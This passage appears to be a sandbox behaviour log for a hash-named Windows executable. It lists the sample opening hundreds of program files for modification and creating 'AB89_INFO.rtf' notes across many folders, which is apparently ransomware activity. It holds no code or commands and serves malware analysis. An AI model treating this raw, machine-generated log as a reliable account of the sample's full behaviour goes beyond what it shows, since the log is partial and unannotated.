C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Chita 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\nacl_irt_x86_64.nexe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.bat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\fonts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tokyo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Costa_Rica 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\kinit.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayman 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Christmas 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Davis 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\InitializeRemove.vstm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoDev.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kwajalein 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Mail\en-US\WinMail.exe.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\plugins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sl.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-14 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ct.sym 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\LICENSE 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Stockholm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Karachi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST5EDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Mendoza 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\ConvertFromRestore.docx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8PDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\RestoreRepair.dotx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\LICENSE 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\mr.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\South_Georgia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guayaquil 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fi.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program 